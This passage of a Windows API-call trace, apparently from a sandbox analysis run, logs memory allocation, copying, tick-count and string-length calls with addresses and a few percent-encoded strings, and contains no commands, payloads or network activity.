(_Block=0x24ae13ae8c0) [0100.798] free (_Block=0x24ae13aeb90) [0100.798] free (_Block=0x24ae13aece0) [0100.799] free (_Block=0x24ae13af1a0) [0100.800] free (_Block=0x24ae13af380) [0100.801] free (_Block=0x24ae13af350) [0100.801] free (_Block=0x24ae13aeb60) [0100.801] free (_Block=0x24ae13aec20) [0100.802] free (_Block=0x24ae13ae7d0) [0100.802] free (_Block=0x24ae13ae710) [0100.802] free (_Block=0x24ae13aeb30) [0100.802] free (_Block=0x24ae13aecb0) [0100.802] free (_Block=0x24ae13aeb00) [0100.803] free (_Block=0x24ae13aec50) [0100.803] free (_Block=0x24ae13aeaa0) [0100.803] free (_Block=0x24ae13aee60) [0100.803] free (_Block=0x24ae13ae9e0) [0100.803] free (_Block=0x24ae13aee00) [0100.803] free (_Block=0x24ae13ae920) [0100.804] free (_Block=0x24ae13aea70) [0100.804] free (_Block=0x24ae13aea40) [0100.804] free (_Block=0x24ae13aeda0) [0100.804] free (_Block=0x24ae13ae980) [0100.804] free (_Block=0x24ae13aead0) [0100.804] free (_Block=0x24ae13ae9b0) [0100.804] free (_Block=0x24ae13ae7a0) [0100.804] free (_Block=0x24ae13aedd0) [0100.805] free (_Block=0x24ae13aed10) [0100.805] free (_Block=0x24ae13aea10) [0100.805] free (_Block=0x24ae13ae770) [0100.805] free (_Block=0x24ae13ae8f0) [0100.805] free (_Block=0x24ae13ae800) [0100.805] free (_Block=0x24ae139c2d0) [0100.806] free (_Block=0x24ae139c300) [0100.806] free (_Block=0x24ae139c390) [0100.806] free (_Block=0x24ae139c2a0) [0100.806] free (_Block=0x24ae139c240) [0100.806] free (_Block=0x24ae139c1e0) [0100.806] free (_Block=0x24ae139c0f0) [0100.806] free (_Block=0x24ae139bd30) [0100.807] free (_Block=0x24ae139c0c0) [0100.807] free (_Block=0x24ae139c000) [0100.807] free (_Block=0x24ae139bdf0) [0100.807] free (_Block=0x24ae139c090) [0100.807] free (_Block=0x24ae139bcd0) [0100.807] free (_Block=0x24ae139bfd0) [0100.808] free (_Block=0x24ae139c270) [0100.808] free (_Block=0x24ae139bfa0) [0100.808] free (_Block=0x24ae139c1b0) [0100.808] free (_Block=0x24ae139bdc0) [0100.809] free (_Block=0x24ae139be50) [0100.809] free (_Block=0x24ae139c150) [0100.809] free (_Block=0x24ae139bd00) [0100.809] free (_Block=0x24ae139bee0) [0100.809] free (_Block=0x24ae139be20) [0100.809] free (_Block=0x24ae139c120) [0100.809] free (_Block=0x24ae139bca0) [0100.810] free (_Block=0x24ae139bf70) [0100.811] free (_Block=0x24ae139bf10) [0100.812] free (_Block=0x24ae139c360) [0100.812] free (_Block=0x24ae139bd90) [0100.812] free (_Block=0x24ae139c330) [0100.812] free (_Block=0x24ae139c030) [0100.812] free (_Block=0x24ae139bc40) [0100.812] free (_Block=0x24ae139c3c0) [0100.812] free (_Block=0x24ae139c210) [0100.812] free (_Block=0x24ae139bc70) [0100.812] free (_Block=0x24ae139c180) [0100.813] free (_Block=0x24ae139bf40) [0100.813] free (_Block=0x24ae139bd60) [0100.813] free (_Block=0x24ae139c060) [0100.813] free (_Block=0x24ae139be80) [0100.813] free (_Block=0x24ae139beb0) [0100.813] free (_Block=0x24ae1480a40) [0100.813] free (_Block=0x24ae1480950) [0100.813] free (_Block=0x24ae1480aa0) [0100.814] free (_Block=0x24ae1480a70) [0100.814] free (_Block=0x24ae1480920) [0100.814] free (_Block=0x24ae14808f0) [0100.814] free (_Block=0x24ae14808c0) [0100.814] free (_Block=0x24ae1480800) [0100.814] free (_Block=0x24ae14809e0) [0100.815] MulDiv (nNumber=1014, nNumerator=100, nDenominator=1990) returned 51 [0100.815] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0100.816] GetTickCount () returned 0x210d326 [0100.816] malloc (_Size=0x28) returned 0x24ae13aecb0 [0100.816] malloc (_Size=0x28) returned 0x24ae13aeb90 [0100.817] free (_Block=0x24ae13aeb90) [0100.817] GetTickCount () returned 0x210d326 [0100.817] malloc (_Size=0x28) returned 0x24ae13aece0 [0100.817] free (_Block=0x24ae13aece0) [0100.818] malloc (_Size=0x28) returned 0x24ae13ae980 [0100.818] malloc (_Size=0x28) returned 0x24ae13aeb60 [0100.818] free (_Block=0x24ae13aeb60) [0100.818] malloc (_Size=0x28) returned 0x24ae13aee00 [0100.818] malloc (_Size=0x28) returned 0x24ae13aea70 [0100.818] malloc (_Size=0x28) returned 0x24ae13aedd0 [0100.819] free (_Block=0x24ae13aedd0) [0100.819] malloc (_Size=0x28) returned 0x24ae13ae740 [0100.819] malloc (_Size=0x28) returned 0x24ae13ae8f0 [0100.819] malloc (_Size=0x28) returned 0x24ae13ae770 [0100.820] free (_Block=0x24ae13ae770) [0100.820] malloc (_Size=0x28) returned 0x24ae13ae830 [0100.821] malloc (_Size=0x28) returned 0x24ae13aee60 [0100.821] malloc (_Size=0x28) returned 0x24ae13ae920 [0100.821] free (_Block=0x24ae13ae920) [0100.821] malloc (_Size=0x28) returned 0x24ae13ae710 [0100.821] malloc (_Size=0x28) returned 0x24ae13aeb00 [0100.822] free (_Block=0x24ae13aeb00) [0100.822] SysStringLen (param_1="%c3%a0%78%61%5c") returned 0xf [0100.822] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1480630 [0100.822] free (_Block=0x24ae1480630) [0100.822] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="à", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0100.823] malloc (_Size=0x28) returned 0x24ae13aee30 [0100.823] free (_Block=0x24ae13aee30) [0100.823] malloc (_Size=0x28) returned 0x24ae13aeb60 [0100.824] malloc (_Size=0x28) returned 0x24ae13aee30 [0100.824] malloc (_Size=0x28) returned 0x24ae13ae9e0 [0100.824] malloc (_Size=0x28) returned 0x24ae13ae890 [0100.825] free (_Block=0x24ae13ae890) [0100.825] malloc (_Size=0x28) returned 0x24ae13aeaa0 [0100.826] free (_Block=0x24ae13aeaa0) [0100.826] malloc (_Size=0x28) returned 0x24ae13aea10 [0100.826] malloc (_Size=0x28) returned 0x24ae13ae7d0 [0100.827] free (_Block=0x24ae13ae7d0) [0100.827] malloc (_Size=0x28) returned 0x24ae13aebf0 [0100.827] malloc (_Size=0x28) returned 0x24ae13aebc0 [0100.827] GetTickCount () returned 0x210d326 [0100.827] malloc (_Size=0x28) returned 0x24ae13aee90 [0100.828] free (_Block=0x24ae13aee90) [0100.828] malloc (_Size=0x28) returned 0x24ae13ae8c0 [0100.828] malloc (_Size=0x28) returned 0x24ae13aeda0 [0100.828] malloc (_Size=0x28) returned 0x24ae13ae950 [0100.829] free (_Block=0x24ae13ae950) [0100.829] malloc (_Size=0x28) returned 0x24ae13ae890 [0100.829] malloc (_Size=0x28) returned 0x24ae13ae950 [0100.829] malloc (_Size=0x28) returned 0x24ae13aeb90 [0100.830] free (_Block=0x24ae13aeb90) [0100.830] malloc (_Size=0x28) returned 0x24ae13ae7d0 [0100.830] malloc (_Size=0x28) returned 0x24ae13aee90 [0100.830] free (_Block=0x24ae13aee90) [0100.830] SysStringLen (param_1="%2a%c3%b3%3e%09") returned 0xf [0100.830] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1480630 [0100.833] free (_Block=0x24ae1480630) [0100.833] malloc (_Size=0x28) returned 0x24ae13aee90 [0100.833] free (_Block=0x24ae13aee90) [0100.833] malloc (_Size=0x70) returned 0x24ae146fe20 [0100.834] GetTickCount () returned 0x210d336 [0100.834] malloc (_Size=0x28) returned 0x24ae13aeb90 [0100.834] malloc (_Size=0x28) returned 0x24ae13ae7a0 [0100.834] malloc (_Size=0x28) returned 0x24ae13aedd0 [0100.835] memcpy (in: _Dst=0x24adf9bc6fe, _Src=0x24adf9bd7e8, _Size=0x2 | out: _Dst=0x24adf9bc6fe) returned 0x24adf9bc6fe [0100.835] memcpy (in: _Dst=0x24adf9bc6fc, _Src=0x24adf9bd9a8, _Size=0x2 | out: _Dst=0x24adf9bc6fc) returned 0x24adf9bc6fc [0100.835] memcpy (in: _Dst=0x24adf9bc6fa, _Src=0x24adf9bd8c8, _Size=0x2 | out: _Dst=0x24adf9bc6fa) returned 0x24adf9bc6fa [0100.835] memcpy (in: _Dst=0x24adf9bc6f8, _Src=0x24adf9bd8a8, _Size=0x2 | out: _Dst=0x24adf9bc6f8) returned 0x24adf9bc6f8 [0100.835] free (_Block=0x24ae13aedd0) [0100.836] memcpy (in: _Dst=0x24adf9bd8e8, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9bd8e8) returned 0x24adf9bd8e8 [0100.836] malloc (_Size=0x28) returned 0x24ae13aec20 [0100.836] memcpy (in: _Dst=0x24adf9bc8ac, _Src=0x24adf9bd8e8, _Size=0x4 | out: _Dst=0x24adf9bc8ac) returned 0x24adf9bc8ac [0100.836] memcpy (in: _Dst=0x24adf9bc8a8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bc8a8) returned 0x24adf9bc8a8 [0100.836] free (_Block=0x24ae13aec20) [0100.837] memcpy (in: _Dst=0x24adf9bd808, _Src=0x24adf9bc8ac, _Size=0x4 | out: _Dst=0x24adf9bd808) returned 0x24adf9bd808 [0100.837] malloc (_Size=0x28) returned 0x24ae13ae920 [0100.837] memcpy (in: _Dst=0x24adf9bd608, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9bd608) returned 0x24adf9bd608 [0100.837] malloc (_Size=0x28) returned 0x24ae13aead0 [0100.838] memcpy (in: _Dst=0x24adf9bca5c, _Src=0x24adf9bd608, _Size=0x4 | out: _Dst=0x24adf9bca5c) returned 0x24adf9bca5c [0100.838] memcpy (in: _Dst=0x24adf9bca58, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bca58) returned 0x24adf9bca58 [0100.838] free (_Block=0x24ae13aead0) [0100.838] memcpy (in: _Dst=0x24adf9bd9c8, _Src=0x24adf9bca5c, _Size=0x4 | out: _Dst=0x24adf9bd9c8) returned 0x24adf9bd9c8 [0100.838] malloc (_Size=0x28) returned 0x24ae13aec20 [0100.838] malloc (_Size=0x28) returned 0x24ae13aee90 [0100.839] memcpy (in: _Dst=0x24adf9bda28, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9bda28) returned 0x24adf9bda28 [0100.839] malloc (_Size=0x28) returned 0x24ae13aed40 [0100.839] memcpy (in: _Dst=0x24adf9bc60c, _Src=0x24adf9bda28, _Size=0x4 | out: _Dst=0x24adf9bc60c) returned 0x24adf9bc60c [0100.839] memcpy (in: _Dst=0x24adf9bc608, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bc608) returned 0x24adf9bc608 [0100.840] free (_Block=0x24ae13aed40) [0100.840] memcpy (in: _Dst=0x24adf9bdc08, _Src=0x24adf9bc60c, _Size=0x4 | out: _Dst=0x24adf9bdc08) returned 0x24adf9bdc08 [0100.840] malloc (_Size=0x28) returned 0x24ae13aea40 [0100.840] malloc (_Size=0x28) returned 0x24ae13aece0 [0100.840] memcpy (in: _Dst=0x24adf9bdac8, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9bdac8) returned 0x24adf9bdac8 [0100.840] malloc (_Size=0x28) returned 0x24ae13ae9b0 [0100.841] memcpy (in: _Dst=0x24adf9bcabc, _Src=0x24adf9bdac8, _Size=0x4 | out: _Dst=0x24adf9bcabc) returned 0x24adf9bcabc [0100.841] memcpy (in: _Dst=0x24adf9bcab8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bcab8) returned 0x24adf9bcab8 [0100.841] free (_Block=0x24ae13ae9b0) [0100.841] memcpy (in: _Dst=0x24adf9bd828, _Src=0x24adf9bcabc, _Size=0x4 | out: _Dst=0x24adf9bd828) returned 0x24adf9bd828 [0100.842] malloc (_Size=0x28) returned 0x24ae13aedd0 [0100.842] malloc (_Size=0x28) returned 0x24ae13ae9b0 [0100.842] GetTickCount () returned 0x210d336 [0100.842] memcpy (in: _Dst=0x24adf9ad84c, _Src=0x24adf9bd828, _Size=0x4 | out: _Dst=0x24adf9ad84c) returned 0x24adf9ad84c [0100.842] memcpy (in: _Dst=0x24adf9ad84a, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ad84a) returned 0x24adf9ad84a [0100.842] memcpy (in: _Dst=0x24adf9ad846, _Src=0x24adf9bdc08, _Size=0x4 | out: _Dst=0x24adf9ad846) returned 0x24adf9ad846 [0100.842] memcpy (in: _Dst=0x24adf9ad844, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ad844) returned 0x24adf9ad844 [0100.842] memcpy (in: _Dst=0x24adf9ad840, _Src=0x24adf9bd9c8, _Size=0x4 | out: _Dst=0x24adf9ad840) returned 0x24adf9ad840 [0100.842] memcpy (in: _Dst=0x24adf9ad83e, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ad83e) returned 0x24adf9ad83e [0100.842] memcpy (in: _Dst=0x24adf9ad83a, _Src=0x24adf9bd808, _Size=0x4 | out: _Dst=0x24adf9ad83a) returned 0x24adf9ad83a [0100.842] memcpy (in: _Dst=0x24adf9ad838, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ad838) returned 0x24adf9ad838 [0100.843] free (_Block=0x24ae13ae9b0) [0100.843] SysStringLen (param_1="%73%73%6f%72") returned 0xc [0100.843] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1480630 [0100.843] memcpy (in: _Dst=0x24adf9bc638, _Src=0x24ae1480630, _Size=0x8 | out: _Dst=0x24adf9bc638) returned 0x24adf9bc638 [0100.843] free (_Block=0x24ae1480630) [0100.843] malloc (_Size=0x2e0) returned 0x24ae1391270 [0100.844] malloc (_Size=0x20) returned 0x24ae13ae770 [0100.844] malloc (_Size=0x288) returned 0x24ae148dd50 [0100.844] GetTickCount () returned 0x210d336 [0100.844] realloc (_Block=0x0, _Size=0x140) returned 0x24ae139cbb0 [0100.844] realloc (_Block=0x24ae13ae770, _Size=0x40) returned 0x24ae146c320 [0100.844] GetTickCount () returned 0x210d336 [0100.844] realloc (_Block=0x24ae139cbb0, _Size=0x280) returned 0x24ae148dac0 [0100.844] malloc (_Size=0x508) returned 0x24ae1486a00 [0100.844] GetTickCount () returned 0x210d336 [0100.844] realloc (_Block=0x24ae146c320, _Size=0x80) returned 0x24ae1480630 [0100.844] realloc (_Block=0x24ae148dac0, _Size=0x500) returned 0x24ae1488d70 [0100.844] GetTickCount () returned 0x210d336 [0100.844] GetTickCount () returned 0x210d336 [0100.844] malloc (_Size=0xa08) returned 0x24ae13b3db0 [0100.845] GetTickCount () returned 0x210d336 [0100.845] realloc (_Block=0x24ae1480630, _Size=0x100) returned 0x24ae1480630 [0100.845] GetTickCount () returned 0x210d336 [0100.845] realloc (_Block=0x24ae1488d70, _Size=0xa00) returned 0x24ae13b0150 [0100.845] GetTickCount () returned 0x210d336 [0100.845] GetTickCount () returned 0x210d336 [0100.845] GetTickCount () returned 0x210d336 [0100.845] GetTickCount () returned 0x210d336 [0100.845] malloc (_Size=0x1408) returned 0x24ae1489a90 [0100.845] GetTickCount () returned 0x210d336 [0100.845] realloc (_Block=0x24ae1480630, _Size=0x200) returned 0x24ae13add40 [0100.845] GetTickCount () returned 0x210d336 [0100.845] GetTickCount () returned 0x210d336 [0100.845] GetTickCount () returned 0x210d336 [0100.845] realloc (_Block=0x24ae13b0150, _Size=0x1400) returned 0x24ae1392090 [0100.845] GetTickCount () returned 0x210d336 [0100.845] GetTickCount () returned 0x210d336 [0100.845] GetTickCount () returned 0x210d336 [0100.845] GetTickCount () returned 0x210d336 [0100.846] GetTickCount () returned 0x210d336 [0100.846] GetTickCount () returned 0x210d336 [0100.846] GetTickCount () returned 0x210d336 [0100.846] GetTickCount () returned 0x210d336 [0100.846] malloc (_Size=0x2808) returned 0x24ae139eed0 [0100.846] GetTickCount () returned 0x210d336 [0100.852] GetTickCount () returned 0x210d345 [0100.853] GetTickCount () returned 0x210d345 [0100.854] GetTickCount () returned 0x210d345 [0100.856] GetTickCount () returned 0x210d345 [0100.859] GetTickCount () returned 0x210d345 [0100.861] GetTickCount () returned 0x210d345 [0100.864] GetTickCount () returned 0x210d355 [0100.866] GetTickCount () returned 0x210d355 [0100.868] GetTickCount () returned 0x210d355 [0100.870] GetTickCount () returned 0x210d355 [0100.872] GetTickCount () returned 0x210d355 [0100.874] malloc (_Size=0x28) returned 0x24ae13aeaa0 [0100.874] malloc (_Size=0x28) returned 0x24ae13aead0 [0100.874] GetTickCount () returned 0x210d355 [0100.874] malloc (_Size=0x28) returned 0x24ae13ae770 [0100.874] memcpy (in: _Dst=0x24adf9bc48e, _Src=0x24adf9bdae8, _Size=0x2 | out: _Dst=0x24adf9bc48e) returned 0x24adf9bc48e [0100.874] memcpy (in: _Dst=0x24adf9bc48c, _Src=0x24adf9bdaa8, _Size=0x2 | out: _Dst=0x24adf9bc48c) returned 0x24adf9bc48c [0100.874] memcpy (in: _Dst=0x24adf9bc48a, _Src=0x24adf9bdbc8, _Size=0x2 | out: _Dst=0x24adf9bc48a) returned 0x24adf9bc48a [0100.874] memcpy (in: _Dst=0x24adf9bc488, _Src=0x24adf9bdb68, _Size=0x2 | out: _Dst=0x24adf9bc488) returned 0x24adf9bc488 [0100.875] free (_Block=0x24ae13ae770) [0100.875] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ª", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0100.875] memcpy (in: _Dst=0x24adf9bdc28, _Src=0xd6788fbb30, _Size=0x6 | out: _Dst=0x24adf9bdc28) returned 0x24adf9bdc28 [0100.875] malloc (_Size=0x28) returned 0x24ae13ae770 [0100.875] memcpy (in: _Dst=0x24adf9bc8de, _Src=0x24ae1a0f6cc, _Size=0xc | out: _Dst=0x24adf9bc8de) returned 0x24adf9bc8de [0100.876] memcpy (in: _Dst=0x24adf9bc8d8, _Src=0x24adf9bdc28, _Size=0x6 | out: _Dst=0x24adf9bc8d8) returned 0x24adf9bc8d8 [0100.876] free (_Block=0x24ae13ae770) [0100.877] malloc (_Size=0x28) returned 0x24ae13aeb00 [0100.877] malloc (_Size=0x28) returned 0x24ae13aed10 [0100.877] malloc (_Size=0x28) returned 0x24ae13ae770 [0100.878] malloc (_Size=0x28) returned 0x24ae13ae800 [0100.879] malloc (_Size=0x28) returned 0x24ae13ae9b0 [0100.879] memcpy (in: _Dst=0x24adf9bc6d2, _Src=0x24adf9bd088, _Size=0x2 | out: _Dst=0x24adf9bc6d2) returned 0x24adf9bc6d2 [0100.879] memcpy (in: _Dst=0x24adf9bc6d0, _Src=0x24adf9bcfa8, _Size=0x2 | out: _Dst=0x24adf9bc6d0) returned 0x24adf9bc6d0 [0100.879] memcpy (in: _Dst=0x24adf9bc6ce, _Src=0x24adf9bd468, _Size=0x2 | out: _Dst=0x24adf9bc6ce) returned 0x24adf9bc6ce [0100.879] memcpy (in: _Dst=0x24adf9bc6cc, _Src=0x24adf9bcfe8, _Size=0x2 | out: _Dst=0x24adf9bc6cc) returned 0x24adf9bc6cc [0100.879] memcpy (in: _Dst=0x24adf9bc6ca, _Src=0x24adf9bcd48, _Size=0x2 | out: _Dst=0x24adf9bc6ca) returned 0x24adf9bc6ca [0100.879] memcpy (in: _Dst=0x24adf9bc6c8, _Src=0x24adf9bcf68, _Size=0x2 | out: _Dst=0x24adf9bc6c8) returned 0x24adf9bc6c8 [0100.880] free (_Block=0x24ae13ae9b0) [0100.880] memcpy (in: _Dst=0x24adf9bd2e8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bd2e8) returned 0x24adf9bd2e8 [0100.880] malloc (_Size=0x28) returned 0x24ae13aed40 [0100.880] memcpy (in: _Dst=0x24adf9bca8c, _Src=0x24adf9bd2e8, _Size=0x4 | out: _Dst=0x24adf9bca8c) returned 0x24adf9bca8c [0100.880] memcpy (in: _Dst=0x24adf9bca88, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bca88) returned 0x24adf9bca88 [0100.881] free (_Block=0x24ae13aed40) [0100.881] memcpy (in: _Dst=0x24adf9bcd88, _Src=0x24adf9bca8c, _Size=0x4 | out: _Dst=0x24adf9bcd88) returned 0x24adf9bcd88 [0100.881] malloc (_Size=0x28) returned 0x24ae13ae9b0 [0100.881] memcpy (in: _Dst=0x24adf9bd488, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bd488) returned 0x24adf9bd488 [0100.881] malloc (_Size=0x28) returned 0x24ae13aeb30 [0100.881] memcpy (in: _Dst=0x24adf9bc72c, _Src=0x24adf9bd488, _Size=0x4 | out: _Dst=0x24adf9bc72c) returned 0x24adf9bc72c [0100.881] memcpy (in: _Dst=0x24adf9bc728, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bc728) returned 0x24adf9bc728 [0100.882] free (_Block=0x24ae13aeb30) [0100.882] memcpy (in: _Dst=0x24adf9bd008, _Src=0x24adf9bc72c, _Size=0x4 | out: _Dst=0x24adf9bd008) returned 0x24adf9bd008 [0100.882] malloc (_Size=0x28) returned 0x24ae13aeb30 [0100.882] malloc (_Size=0x28) returned 0x24ae13aed40 [0100.882] memcpy (in: _Dst=0x24adf9bd1e8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bd1e8) returned 0x24adf9bd1e8 [0100.882] malloc (_Size=0x28) returned 0x24ae13aec50 [0100.883] memcpy (in: _Dst=0x24adf9bc75c, _Src=0x24adf9bd1e8, _Size=0x4 | out: _Dst=0x24adf9bc75c) returned 0x24adf9bc75c [0100.883] memcpy (in: _Dst=0x24adf9bc758, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bc758) returned 0x24adf9bc758 [0100.883] free (_Block=0x24ae13aec50) [0100.883] memcpy (in: _Dst=0x24adf9bd1a8, _Src=0x24adf9bc75c, _Size=0x4 | out: _Dst=0x24adf9bd1a8) returned 0x24adf9bd1a8 [0100.883] malloc (_Size=0x28) returned 0x24ae13aec50 [0100.883] malloc (_Size=0x28) returned 0x24ae13aec80 [0100.883] GetTickCount () returned 0x210d365 [0100.884] memcpy (in: _Dst=0x24adf9bce28, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bce28) returned 0x24adf9bce28 [0100.884] malloc (_Size=0x28) returned 0x24ae13af2f0 [0100.884] memcpy (in: _Dst=0x24adf9bc78c, _Src=0x24adf9bce28, _Size=0x4 | out: _Dst=0x24adf9bc78c) returned 0x24adf9bc78c [0100.884] memcpy (in: _Dst=0x24adf9bc788, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bc788) returned 0x24adf9bc788 [0100.885] free (_Block=0x24ae13af2f0) [0100.885] memcpy (in: _Dst=0x24adf9bd308, _Src=0x24adf9bc78c, _Size=0x4 | out: _Dst=0x24adf9bd308) returned 0x24adf9bd308 [0100.885] malloc (_Size=0x28) returned 0x24ae13af5f0 [0100.885] malloc (_Size=0x28) returned 0x24ae13af020 [0100.885] memcpy (in: _Dst=0x24adf9bcf28, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bcf28) returned 0x24adf9bcf28 [0100.885] malloc (_Size=0x28) returned 0x24ae13af0b0 [0100.886] memcpy (in: _Dst=0x24adf9bc7ec, _Src=0x24adf9bcf28, _Size=0x4 | out: _Dst=0x24adf9bc7ec) returned 0x24adf9bc7ec [0100.886] memcpy (in: _Dst=0x24adf9bc7e8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bc7e8) returned 0x24adf9bc7e8 [0100.886] free (_Block=0x24ae13af0b0) [0100.886] memcpy (in: _Dst=0x24adf9bd168, _Src=0x24adf9bc7ec, _Size=0x4 | out: _Dst=0x24adf9bd168) returned 0x24adf9bd168 [0100.886] malloc (_Size=0x28) returned 0x24ae13af0b0 [0100.886] malloc (_Size=0x28) returned 0x24ae13af6b0 [0100.887] memcpy (in: _Dst=0x24adf9bcda8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bcda8) returned 0x24adf9bcda8 [0100.887] malloc (_Size=0x28) returned 0x24ae13af4a0 [0100.887] memcpy (in: _Dst=0x24adf9bc93c, _Src=0x24adf9bcda8, _Size=0x4 | out: _Dst=0x24adf9bc93c) returned 0x24adf9bc93c [0100.887] memcpy (in: _Dst=0x24adf9bc938, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bc938) returned 0x24adf9bc938 [0100.888] free (_Block=0x24ae13af4a0) [0100.888] memcpy (in: _Dst=0x24adf9bcd08, _Src=0x24adf9bc93c, _Size=0x4 | out: _Dst=0x24adf9bcd08) returned 0x24adf9bcd08 [0100.888] malloc (_Size=0x28) returned 0x24ae13af2c0 [0100.888] malloc (_Size=0x28) returned 0x24ae13af380 [0100.888] memcpy (in: _Dst=0x24adf9a5608, _Src=0x24adf9bcd08, _Size=0x4 | out: _Dst=0x24adf9a5608) returned 0x24adf9a5608 [0100.888] memcpy (in: _Dst=0x24adf9a5606, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5606) returned 0x24adf9a5606 [0100.888] memcpy (in: _Dst=0x24adf9a5602, _Src=0x24adf9bd168, _Size=0x4 | out: _Dst=0x24adf9a5602) returned 0x24adf9a5602 [0100.888] memcpy (in: _Dst=0x24adf9a5600, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5600) returned 0x24adf9a5600 [0100.888] memcpy (in: _Dst=0x24adf9a55fc, _Src=0x24adf9bd308, _Size=0x4 | out: _Dst=0x24adf9a55fc) returned 0x24adf9a55fc [0100.888] memcpy (in: _Dst=0x24adf9a55fa, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a55fa) returned 0x24adf9a55fa [0100.888] memcpy (in: _Dst=0x24adf9a55f6, _Src=0x24adf9bd1a8, _Size=0x4 | out: _Dst=0x24adf9a55f6) returned 0x24adf9a55f6 [0100.888] memcpy (in: _Dst=0x24adf9a55f4, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a55f4) returned 0x24adf9a55f4 [0100.888] memcpy (in: _Dst=0x24adf9a55f0, _Src=0x24adf9bd008, _Size=0x4 | out: _Dst=0x24adf9a55f0) returned 0x24adf9a55f0 [0100.888] memcpy (in: _Dst=0x24adf9a55ee, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a55ee) returned 0x24adf9a55ee [0100.888] memcpy (in: _Dst=0x24adf9a55ea, _Src=0x24adf9bcd88, _Size=0x4 | out: _Dst=0x24adf9a55ea) returned 0x24adf9a55ea [0100.889] memcpy (in: _Dst=0x24adf9a55e8, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a55e8) returned 0x24adf9a55e8 [0100.889] free (_Block=0x24ae13af380) [0100.889] SysStringLen (param_1="%c2%a3%50%c2%94%37") returned 0x12 [0100.890] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1480630 [0100.891] memcpy (in: _Dst=0x24adf9bc968, _Src=0x24ae1480630, _Size=0x8 | out: _Dst=0x24adf9bc968) returned 0x24adf9bc968 [0100.891] free (_Block=0x24ae1480630) [0100.891] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="£", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0100.891] memcpy (in: _Dst=0x24adf9bcde8, _Src=0xd6788fbb30, _Size=0x6 | out: _Dst=0x24adf9bcde8) returned 0x24adf9bcde8 [0100.891] malloc (_Size=0x28) returned 0x24ae13af410 [0100.892] memcpy (in: _Dst=0x24adf9bc84e, _Src=0x24ae1a0f6cc, _Size=0xc | out: _Dst=0x24adf9bc84e) returned 0x24adf9bc84e [0100.892] memcpy (in: _Dst=0x24adf9bc848, _Src=0x24adf9bcde8, _Size=0x6 | out: _Dst=0x24adf9bc848) returned 0x24adf9bc848 [0100.892] free (_Block=0x24ae13af410) [0100.893] GetTickCount () returned 0x210d365 [0100.893] malloc (_Size=0x28) returned 0x24ae13af200 [0100.894] malloc (_Size=0x28) returned 0x24ae13aefc0 [0100.895] malloc (_Size=0x28) returned 0x24ae13af0e0 [0100.895] malloc (_Size=0x28) returned 0x24ae13af4a0 [0100.896] malloc (_Size=0x28) returned 0x24ae13af530 [0100.896] memcpy (in: _Dst=0x24adf9bc9a2, _Src=0x24adf9bd328, _Size=0x2 | out: _Dst=0x24adf9bc9a2) returned 0x24adf9bc9a2 [0100.896] memcpy (in: _Dst=0x24adf9bc9a0, _Src=0x24adf9bcec8, _Size=0x2 | out: _Dst=0x24adf9bc9a0) returned 0x24adf9bc9a0 [0100.896] memcpy (in: _Dst=0x24adf9bc99e, _Src=0x24adf9bce88, _Size=0x2 | out: _Dst=0x24adf9bc99e) returned 0x24adf9bc99e [0100.896] memcpy (in: _Dst=0x24adf9bc99c, _Src=0x24adf9bd188, _Size=0x2 | out: _Dst=0x24adf9bc99c) returned 0x24adf9bc99c [0100.896] memcpy (in: _Dst=0x24adf9bc99a, _Src=0x24adf9bd268, _Size=0x2 | out: _Dst=0x24adf9bc99a) returned 0x24adf9bc99a [0100.896] memcpy (in: _Dst=0x24adf9bc998, _Src=0x24adf9bcf08, _Size=0x2 | out: _Dst=0x24adf9bc998) returned 0x24adf9bc998 [0100.897] free (_Block=0x24ae13af530) [0100.897] memcpy (in: _Dst=0x24adf9bd0e8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bd0e8) returned 0x24adf9bd0e8 [0100.897] malloc (_Size=0x28) returned 0x24ae13af470 [0100.897] memcpy (in: 